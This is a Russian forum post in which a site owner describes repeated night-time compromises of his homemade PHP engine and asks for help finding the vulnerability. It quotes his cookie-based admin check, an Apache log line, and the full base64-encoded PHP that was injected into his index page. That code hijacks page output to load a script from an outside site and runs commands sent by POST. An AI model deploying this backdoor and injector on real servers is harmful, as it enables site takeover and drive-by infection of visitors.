Такое дело. Есть самописный двиг (для сайтов визиток), вернее, еще его зачаточная часть. Прошедшей ночью столкнулся с неким мега-хакером, который все ночь на пролет вставлял мне в индекс фрейм. Очень врятли это был бот ибо действия были несколько разными. Закончилось все в 5 утра (началось в 1 ночи) - наверное, спать пошел.
Кароч, двиг на php5+MySQL, в админке стоит CKEDITOR 3.0 (последний, вродь), двиг юзает mod_rewrite апача. 2 сайта на разных хостингах.
SQL инъекций нет - факт, инклудов быть не может, впринцепе, все внешние переменные проверяются и что туда не вставляй - пох должно быть, никаких кавычкинсов волшебных, никаких регистр глобалсов. Хостинги Зенон и majordomo (не думаю, что их 2 сразу поломали)))
Авторизация на одного пользователя в админку тупым методом:
| Код |
if ($_COOKIE['post_admin_name'] == $admin_name AND $_COOKIE['post_admin_pass'] == $admin_pass) {
|
Написаны фактически одинакого, но есть разные "фишки")). Суть в том, что кто-то произвольно закачивал файлы на хост и прописывал в индекс евал (в базе64) с фреймом, собственно, находил непонятные пустые папки и прочее.
| Код |
<?php print(base64_decode(& #39;aWYoIWlzc2V0KCR0bHBzMSkpe2Z1bmN0aW9uIHRscHMoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcj
PHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3Vu
dChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/ IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9
IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9t
Q2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxh
Y2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/ KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19t
YXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNp
JywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2
LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNv
ZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyOXlkR2h2Wkc5dWRHbGpMbU5oTDE5MmRHbGZkSGgw
TDJabFpXUmlZV05yTG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJv
ZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3Ry
cG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHRscHMyKCRhLCRiLCRjLCRkKXtn
bG9iYWwgJHRscHMxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR0bHBzMSkpY2FsbF91c2Vy
X2Z1bmMoJHRscHMxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlm
KCgkYT0kdlsnbmFtZSddKT09J3RscHMnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJy
ZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtm
b3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29i
X2VuZF9jbGVhbigpO31vYl9zdGFydCgndGxwcycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtv
Yl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSR0bHBzbD0oKCRhPUBzZXRfZXJyb3Jf
aGFuZGxlcigndGxwczInKSkhPSd0bHBzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsn
ZSddKSk7')); ?>
|
Да, в логах апача нашел только такое, больше ничего интересного:
| Код |
83.149.3.110 - - [14/Oct/2009:22:44:48 +0400] "GET http://www.******.ru/\xe0\xac\x8b\xe0\xac\x8bAAAAAAAAAAAAAAAAAAAAAAAAA?chap=\xe0\xac\x8b\xe0\xac\x8bAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0" 200
|
Прошу помощи, надо найти "дырки" )) Если кто из рубит и готов помочь бесплатно - WELCOME! Если за деньги - все писать в топ в открытую цену. Факт уязвимости есть - сам чет не найду (только цкэдитор не капал).
|